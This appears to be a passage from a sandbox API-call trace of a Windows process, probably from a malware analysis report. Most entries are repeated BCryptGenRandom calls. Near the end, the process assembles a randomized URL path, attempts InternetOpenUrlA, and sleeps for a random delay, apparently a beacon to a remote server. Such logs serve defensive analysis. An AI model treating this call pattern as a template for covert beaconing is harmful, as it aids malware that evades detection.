0x0 [0266.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0266.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e5e, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d5e5e) returned 0x0 [0266.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0266.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e81, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d5e81) returned 0x0 [0266.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0266.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.484] GetProcessHeap () returned 0x440000 [0266.484] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0266.484] lstrcpyA (in: lpString1=0x473560, lpString2=" ^M" | out: lpString1=" ^M") returned=" ^M" [0266.484] lstrcatA (in: lpString1=" ^M", lpString2="/n0yb7Z0imn3231iYmE1jK56g3lxpgApqdqwfnJ/ydDuf1u5ibl9PMvu1Ecsp/zo7kqzrihm3r3W5Numbp05Wc3n4b9xj4Pm/qthise6855Iske2qzAmZjgbuobTdp59bu0X0/" | out: lpString1=" ^M/n0yb7Z0imn3231iYmE1jK56g3lxpgApqdqwfnJ/ydDuf1u5ibl9PMvu1Ecsp/zo7kqzrihm3r3W5Numbp05Wc3n4b9xj4Pm/qthise6855Iske2qzAmZjgbuobTdp59bu0X0/") returned=" ^M/n0yb7Z0imn3231iYmE1jK56g3lxpgApqdqwfnJ/ydDuf1u5ibl9PMvu1Ecsp/zo7kqzrihm3r3W5Numbp05Wc3n4b9xj4Pm/qthise6855Iske2qzAmZjgbuobTdp59bu0X0/" [0266.485] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0266.485] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=" ^M/n0yb7Z0imn3231iYmE1jK56g3lxpgApqdqwfnJ/ydDuf1u5ibl9PMvu1Ecsp/zo7kqzrihm3r3W5Numbp05Wc3n4b9xj4Pm/qthise6855Iske2qzAmZjgbuobTdp59bu0X0/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0266.485] GetProcessHeap () returned 0x440000 [0266.485] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0266.485] GetProcessHeap () returned 0x440000 [0266.485] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0266.485] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0266.486] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0266.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0266.486] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0266.487] Sleep (dwMilliseconds=0x12612) [0266.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0266.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.715] GetProcessHeap () returned 0x440000 [0266.715] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a173e0 [0266.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a173e1, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a173e1) returned 0x0 [0266.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 